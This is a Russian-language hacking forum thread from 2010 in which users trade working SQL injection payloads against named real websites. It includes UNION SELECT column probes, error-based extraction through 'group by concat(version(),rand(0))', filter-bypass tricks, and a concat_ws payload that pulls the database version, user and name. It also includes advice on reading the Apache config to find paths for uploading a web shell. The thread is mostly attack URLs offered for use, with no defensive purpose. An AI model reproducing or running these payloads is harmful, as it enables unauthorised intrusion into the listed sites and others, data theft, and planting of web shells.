16.08.2010, 20:16
|
|
Новичок
Регистрация: 11.07.2009
Сообщений: 3
С нами:
8860452
Репутация:
0
|
|
попугай от того что я перешёл на оперу ничего не изменилось(
IMMORTAL_S софт тот что у меня есть фильтр не обходит
|
|
|
16.08.2010, 21:20
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от Koren
category.php?categoryID=55+union+select+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16+--+ указывает на фильтрацию, обхожу фильтр выдаёт цифры для вывода инфы но страница держится не больше 1 секунды, и перекидывает на главгую, возможно что то сделать?
впринцепи решение уже нашёл.. "остановив страницу"))
ну может есть ещё какой способ
т.к не всегда получается успеть нажать на stop
Мдауж, отруби редирект + javascript в браузере.
Сообщение от Koren
о чём это говорит? You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union*/ /*!select*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 -- )) ORD' at line 1
недопустимые символы? или же?
как только не пробывал фильтровать
ответ один и тот же.. либы ошибка(фильтр) или вот это сообщение
)) union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 --
Сообщение от Byrger
Вот ссылка, мне не жалко но если кто-то ковырнет раньше меня то поделитесь со всеми
http://www.flashloaded.com/cart/basket.php?action=Add&itemid=6587
Сообщение от None
http://www.flashloaded.com/cart/basket.php?action=Add&itemid=1+or+1+group+by+conca t(version(),rand(0)|0)+having+min(0)+--+
|
|
|
|
16.08.2010, 22:45
|
|
Познающий
Регистрация: 17.04.2009
Сообщений: 59
С нами:
8982831
Репутация:
37
|
|
Сообщение от Gorev
если читалка работает то попробуй найти /etc/httpd/conf/httpd.conf
У меня тоже есть сайтиги где можно через скулю залить шелл, но пути незнаю. Прочитал файл /etc/httpd/conf/httpd.conf , но путей не нашел. Или в конфиге апача не всегда путь найти можно? Кто подскажет?
|
|
|
|
16.08.2010, 22:49
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от ZARO
У меня тоже есть сайтиги где можно через скулю залить шелл, но пути незнаю. Прочитал файл
/etc/httpd/conf/httpd.conf
, но путей не нашел. Или в конфиге апача не всегда путь найти можно? Кто подскажет?
Покажи сайт в пм.
|
|
|
|
17.08.2010, 02:21
|
|
Новичок
Регистрация: 11.07.2009
Сообщений: 3
С нами:
8860452
Репутация:
0
|
|
Charle не во всех случаях помогает отрубленая джаваскрипт
|
|
|
|
17.08.2010, 12:00
|
|
Новичок
Регистрация: 31.12.2009
Сообщений: 19
С нами:
8611638
Репутация:
10
|
|
Научите плз крутить такие инъекции, когда order by показывает определенное кол-во полей, но union select говорит, что кол-во полей не совпадает.. в общем как бы двойная инъекция должна быть, а вот с синтаксисом у меня траблы...
Код:
http://www.starallergyalerts.com.au/shop/cart.php?target=product&product_id=16264+union+select+1,2,3,4,5,6--&category_id=259
спасибо! |
|
|
|
17.08.2010, 15:49
|
|
Познающий
Регистрация: 17.04.2009
Сообщений: 59
С нами:
8982831
Репутация:
37
|
|
Сообщение от sqlinjector
Научите плз крутить такие инъекции, когда order by показывает определенное кол-во полей, но union select говорит, что кол-во полей не совпадает.. в общем как бы двойная инъекция должна быть, а вот с синтаксисом у меня траблы...
Код:
http://www.starallergyalerts.com.au/shop/cart.php?target=product&product_id=16264+union+select+1,2,3,4,5,6--&category_id=259
спасибо! И какое кол-во полей тебе показывает order by?
З.Ы.
Код:
http://www.starallergyalerts.com.au/shop/cart.php?target=product&product_id=16264'and+mid(version(),1,1)='4&category_id=259
Код:
http://www.starallergyalerts.com.au/shop/cart.php?target=product&product_id=16264'or+(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+version()),1,64),floor(rand(0)*2)))='1&category_id=259
Вывод в ошибке - 4.1.22-log
|
|
|
|
17.08.2010, 15:59
|
|
Новичок
Регистрация: 16.12.2009
Сообщений: 29
С нами:
8633638
Репутация:
0
|
|
Есть скуль, фильтрует select или union. Может кто помочь раскрутить ?
Сообщение от None
http://www.music-master.ru/?action=show_list&cat=11069%27+union+select+1/*
|
|
|
|
17.08.2010, 16:10
|
|
Познающий
Регистрация: 17.04.2009
Сообщений: 59
С нами:
8982831
Репутация:
37
|
|
Сообщение от a1ertso
Есть скуль, фильтрует select или union. Может кто помочь раскрутить ?
http://www.music-master.ru/?action=show_list&cat=-11069+'+union+select+concat_ws(0x3a,version(),user (),database())+--+
|
|
|
|
17.08.2010, 16:16
|
|
Новичок
Регистрация: 16.12.2009
Сообщений: 29
С нами:
8633638
Репутация:
0
|
|
ZARO, спасибо. А можете объяснить, почему вывод осуществляется только при соединении строк?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
